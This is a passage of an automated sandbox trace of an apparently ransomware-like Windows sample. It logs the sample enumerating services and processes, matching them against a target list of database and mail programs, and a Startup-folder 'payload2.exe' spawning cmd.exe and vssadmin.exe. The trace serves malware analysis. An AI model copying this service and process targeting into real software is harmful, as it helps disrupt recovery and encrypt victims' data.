lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0050.852] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0050.852] lstrlenW (lpString="swprv") returned 5 [0050.852] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0050.852] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0050.852] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0050.852] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0050.852] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0050.852] lstrlenW (lpString="SysMain") returned 7 [0050.852] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0050.852] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0050.852] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0050.852] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0050.852] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0050.852] lstrlenW (lpString="Themes") returned 6 [0050.852] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0050.852] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0050.852] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0050.852] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0050.852] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0050.852] lstrlenW (lpString="TrkWks") returned 6 [0050.852] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0050.852] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0050.852] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0050.853] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0050.853] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0050.853] lstrlenW (lpString="UxSms") returned 5 [0050.853] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0050.853] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0050.853] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0050.853] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0050.853] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0050.853] lstrlenW (lpString="VSS") returned 3 [0050.853] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0050.853] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0050.853] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0050.853] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0050.853] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0050.853] lstrlenW (lpString="WdiServiceHost") returned 14 [0050.853] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0050.853] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0050.853] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0050.853] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0050.853] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0050.853] lstrlenW (lpString="WdiSystemHost") returned 13 [0050.853] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0050.853] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0050.853] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0050.853] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0050.853] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0050.853] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0050.853] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0050.853] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0050.853] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0050.853] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0050.853] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0050.853] lstrlenW (lpString="Winmgmt") returned 7 [0050.853] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0050.853] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0050.853] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0050.853] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0050.854] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0050.854] lstrlenW (lpString="WPDBusEnum") returned 10 [0050.854] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0050.854] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0050.854] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0050.854] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0050.854] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0050.854] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3940ef0 | out: hHeap=0x600000) returned 1 [0050.854] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x190 [0050.867] Process32FirstW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0050.867] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0051.081] lstrlenW (lpString="System") returned 6 [0051.081] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0051.081] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0051.081] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0051.081] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0051.081] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0051.081] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0051.081] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0051.081] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0051.082] lstrlenW (lpString="smss.exe") returned 8 [0051.082] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0051.082] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0051.082] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0051.082] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0051.082] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0051.082] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0051.082] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0051.082] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0051.083] lstrlenW (lpString="csrss.exe") returned 9 [0051.083] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0051.083] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0051.083] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0051.083] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0051.083] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0051.083] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0051.083] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0051.083] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0051.084] lstrlenW (lpString="wininit.exe") returned 11 [0051.084] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0051.084] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0051.084] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0051.084] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0051.084] lstrlenW (lpString="csrss.exe") returned 9 [0051.084] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0051.085] lstrlenW (lpString="winlogon.exe") returned 12 [0051.085] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0051.086] lstrlenW (lpString="services.exe") returned 12 [0051.086] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0051.086] lstrlenW (lpString="lsass.exe") returned 9 [0051.086] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0051.087] lstrlenW (lpString="lsm.exe") returned 7 [0051.087] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.088] lstrlenW (lpString="svchost.exe") returned 11 [0051.088] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.088] lstrlenW (lpString="svchost.exe") returned 11 [0051.088] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.089] lstrlenW (lpString="svchost.exe") returned 11 [0051.089] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.090] lstrlenW (lpString="svchost.exe") returned 11 [0051.090] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.090] lstrlenW (lpString="svchost.exe") returned 11 [0051.090] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0051.091] lstrlenW (lpString="audiodg.exe") returned 11 [0051.091] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.091] lstrlenW (lpString="svchost.exe") returned 11 [0051.092] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.092] lstrlenW (lpString="svchost.exe") returned 11 [0051.092] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0051.093] lstrlenW (lpString="dwm.exe") returned 7 [0051.093] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0051.093] lstrlenW (lpString="explorer.exe") returned 12 [0051.094] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0051.094] lstrlenW (lpString="spoolsv.exe") returned 11 [0051.094] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0051.095] lstrlenW (lpString="taskhost.exe") returned 12 [0051.095] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.095] lstrlenW (lpString="svchost.exe") returned 11 [0051.095] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0051.096] lstrlenW (lpString="taskeng.exe") returned 11 [0051.096] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0051.097] lstrlenW (lpString="taskhost.exe") returned 12 [0051.097] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0051.097] lstrlenW (lpString="challenging.exe") returned 15 [0051.097] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0051.098] lstrlenW (lpString="pgp prix.exe") returned 12 [0051.098] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0051.098] lstrlenW (lpString="user-reno.exe") returned 13 [0051.098] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0051.099] lstrlenW (lpString="aggregate.exe") returned 13 [0051.099] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0051.100] lstrlenW (lpString="dressed.exe") returned 11 [0051.100] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0051.100] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0051.100] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0051.101] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0051.101] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0051.102] lstrlenW (lpString="developing.exe") returned 14 [0051.102] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0051.102] lstrlenW (lpString="supported.exe") returned 13 [0051.102] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0051.103] lstrlenW (lpString="girlstionselect.exe") returned 19 [0051.103] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0051.104] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0051.104] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0051.104] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0051.104] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0051.318] lstrlenW (lpString="eating.exe") returned 10 [0051.318] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0051.318] lstrlenW (lpString="nh_protected.exe") returned 16 [0051.319] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0051.319] lstrlenW (lpString="vulnerability.exe") returned 17 [0051.319] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0051.320] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0051.320] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0051.320] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0051.320] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0051.322] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0051.322] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0051.323] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0051.323] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0051.324] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0051.324] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0051.324] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0051.324] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0051.325] lstrlenW (lpString="cmd.exe") returned 7 [0051.325] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0051.326] lstrlenW (lpString="conhost.exe") returned 11 [0051.326] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0051.326] lstrlenW (lpString="vssadmin.exe") returned 12 [0051.326] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0051.327] lstrlenW (lpString="VSSVC.exe") returned 9 [0051.327] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0051.328] lstrlenW (lpString="svchost.exe") returned 11 [0051.328] Process32NextW (in: hSnapshot=0x190, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, 